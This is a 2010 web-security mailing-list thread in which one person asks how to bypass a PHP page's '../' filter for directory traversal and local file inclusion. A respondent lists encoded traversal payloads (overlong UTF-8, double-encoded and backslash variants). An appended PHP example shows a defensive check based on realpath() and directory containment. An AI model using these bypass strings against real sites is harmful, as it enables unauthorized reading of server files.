[WEB SECURITY] ../ filtered

Shlomi Narkolayev shlominar at gmail.com
Mon Feb 22 04:51:06 EST 2010


If ".." is rejected, try these:
%c0%ae%c0%ae\FILENAME
%uff0e%uff0e/FILENAME
%c0%ae%c0%ae/FILENAME
%2e%2e%5cFILENAME
%2e%2e\%2e%2e\FILENAME
%2e%2e%2fFILENAME

If you still need more combinations, check my blog
<http://narkolayev-shlomi.blogspot.com/> in a few days for the full list.


Kind Regards,
Narkolayev Shlomi.




*From:* Beatriz Duran [mailto:beatrizdrn at yahoo.com]
*Sent:* Tuesday, February 16, 2010 4:40 PM
*To:* Shlomi Narkolayev; websecurity at webappsec.org
*Subject:* Re: [WEB SECURITY] ../ filtered



Shlomi,

I tried those already, but they and the ones with ".." are rejected; the
variable is verifying the string before running it, and with the combination:


%252e%252e/FILENAME this happens:

viewfiles.php?folder=%252e%252e/

The 25s are removed, so the %2e%2e are left but transformed into pure text,
so the page reports that the directory %2e%2e doesn't exist; but if I apply
purely viewfiles.php?folder=%2e%2e/ the page rejects them and says .. are not
allowed.

 ------------------------------

*From:* Shlomi Narkolayev <shlominar at gmail.com>
*To:* beatrizdrn at yahoo.com; websecurity at webappsec.org
*Sent:* Tue, February 16, 2010 12:41:16 AM
*Subject:* RE: [WEB SECURITY] ../ filtered

Try these:
..%5c..%5cFILENAME
%2e%2e\%2e%2e\FILENAME
..%c0%af..%c0%afFILENAME
..%255c..%255cFILENAME
%252e%252e/FILENAME
..%2f..%2fFILENAME
..%252f..%252fFILENAME


Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> 1400
new variants for directory traversal.

Kind Regards,
Narkolayev Shlomi.



*From:* Beatriz Duran [mailto:beatrizdrn at yahoo.com]
*Sent:* Monday, February 15, 2010 9:43 AM
*To:* websecurity at webappsec.org
*Subject:* [WEB SECURITY] ../ filtered



Hi, I need to find a vulnerability in a URL that could be exploited for
directory traversal and LFI; the page is working with PHP but it is
filtering /../ and also /%2e%2e/, because the page is using ISO for Latin
characters I can't use extended Unicode because it reinterprets it with other
values; is there another way to work around the filter?
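
The filtering discussed in this thread, seen from the defending side, as an added example that is not part of the original messages: instead of matching ".." in the request string, the folder value is resolved with realpath() and the resolved path is checked for containment in a base directory. The helper name resolve_folder() and the demo directory layout are assumptions; the sample inputs are strings quoted in the thread, with FILENAME dropped.

```php
<?php
// Added example; resolve_folder() and the demo directory layout are hypothetical.

function resolve_folder(string $baseDir, string $folder): ?string
{
    $base = realpath($baseDir);
    // Refuse NUL bytes up front; PHP 8 filesystem functions throw on them.
    if ($base === false || strpos($folder, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, and returns false when the
    // path does not exist, so a leftover literal such as "%2e%2e" fails here.
    $target = realpath($base . DIRECTORY_SEPARATOR . $folder);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // Containment test on the resolved path. The trailing separator stops a
    // sibling such as "files-old" from matching the base "files".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo tree: <tmp>/viewfiles_demo_<pid>/files/reports
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'viewfiles_demo_' . getmypid();
$base = $root . DIRECTORY_SEPARATOR . 'files';
mkdir($base . DIRECTORY_SEPARATOR . 'reports', 0700, true);

// Raw query values: one legitimate folder plus strings quoted in the thread.
$samples = ['reports', '..', '%2e%2e/', '%252e%252e/', '%c0%ae%c0%ae/', '..%5c', '..%2f'];

foreach ($samples as $raw) {
    // PHP decodes $_GET exactly once; urldecode() models that single pass.
    $folder = urldecode($raw);
    $result = resolve_folder($base, $folder);
    printf("%-14s => %s\n", $raw, $result === null ? 'rejected' : 'allowed');
}

// Remove the demo tree.
rmdir($base . DIRECTORY_SEPARATOR . 'reports');
rmdir($base);
rmdir($root);
```

Because the decision is made on the resolved path, the check does not depend on which encoding of ".." or of the separator reached the application, and the value is never decoded a second time.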